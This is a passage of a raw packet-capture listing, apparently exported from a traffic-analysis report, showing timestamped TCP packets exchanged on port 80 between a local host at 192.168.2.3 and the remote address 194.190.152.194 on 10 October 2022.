                                                                                                                                    Oct 10, 2022 06:01:57.188676119 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.188697100 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.188723087 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.188770056 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.188788891 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.188815117 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.188836098 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.188855886 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.188885927 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.188901901 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.188942909 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.188973904 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189006090 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189038038 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189044952 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189080000 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189109087 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189122915 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189138889 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189163923 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189194918 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189196110 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189205885 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189230919 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189246893 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189265966 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189291000 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189316034 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189333916 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189352036 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189377069 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189403057 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189418077 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189446926 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189459085 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189491987 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189500093 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189524889 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189542055 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189575911 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189585924 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189610004 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189629078 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189659119 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189668894 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189735889 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189738989 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189769030 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189780951 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.189841032 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.189841032 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231002092 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231072903 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231120110 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231162071 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231199980 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231204987 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231199980 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231268883 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231268883 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231311083 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231355906 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231390953 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231398106 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231416941 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231437922 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231452942 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231478930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231502056 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231518984 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231528997 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231559992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231573105 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231601954 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231618881 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231642962 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231659889 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231683969 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231700897 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231724977 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231741905 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231765985 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231787920 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231806993 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231818914 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231847048 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231863976 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231893063 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231908083 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231935024 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231951952 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.231976032 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.231992960 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232018948 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232042074 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232059002 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232070923 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232099056 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232115030 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232140064 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232157946 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232180119 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232193947 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232220888 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232237101 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232265949 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232275963 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232306004 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232322931 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232346058 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232361078 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232388020 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232403994 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232429028 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232444048 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232470036 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232485056 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232511044 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232527018 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232553005 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232564926 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232595921 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232605934 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232636929 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232650995 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232678890 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232695103 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232722044 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232737064 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232762098 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232841969 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232886076 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232927084 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.232943058 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.232969046 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233010054 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233025074 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233052015 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233072996 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233092070 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233131886 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233144045 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233172894 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233213902 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233226061 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233254910 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233297110 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233305931 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233338118 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233380079 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233392954 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233422995 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233468056 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233481884 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233508110 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233549118 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233565092 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233593941 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233637094 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233644962 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233676910 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233717918 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233726978 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233757973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233798981 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233810902 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233839989 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233884096 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233895063 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.233926058 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233968973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.233994007 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234009027 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234054089 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234066963 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234093904 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234133959 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234175920 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234179020 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234215975 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234245062 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234256983 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234299898 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234314919 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234338999 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234381914 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234392881 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234424114 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234463930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234474897 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234504938 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234544992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234556913 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.234577894 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234620094 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.234637022 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.235711098 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.251405954 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251471996 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251503944 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251545906 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251580000 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251621962 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251697063 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251738071 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251749039 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.251749039 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.251779079 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251820087 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251849890 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.251849890 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.251863956 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251910925 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251910925 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.251952887 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.251995087 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252011061 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252036095 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252075911 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252094984 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252116919 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252160072 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252167940 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252199888 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252240896 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252254009 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252284050 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252324104 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252335072 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252365112 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252405882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252417088 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252446890 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252487898 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252496958 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252526999 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252568960 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252578020 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252610922 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252650976 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252661943 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252691984 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252732038 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252743959 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252772093 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252813101 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252823114 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252854109 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252901077 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252907038 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.252943039 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.252995968 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253010035 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253036976 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253077984 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253088951 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253118038 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253158092 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253176928 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253199100 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253241062 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253251076 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253282070 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253323078 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253334045 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253362894 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253405094 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253415108 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253444910 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253487110 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253494024 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253529072 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253571033 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253580093 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253613949 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253654003 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253665924 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253694057 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253734112 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253750086 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253773928 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253813982 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253832102 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253854036 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253899097 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253914118 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.253941059 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253981113 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.253993034 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.254023075 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.254064083 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.254086018 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.254103899 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.254143953 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.254153967 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.254184008 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.254225016 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.254234076 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.254266024 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.254304886 CEST8049692194.190.152.194192.168.2.3
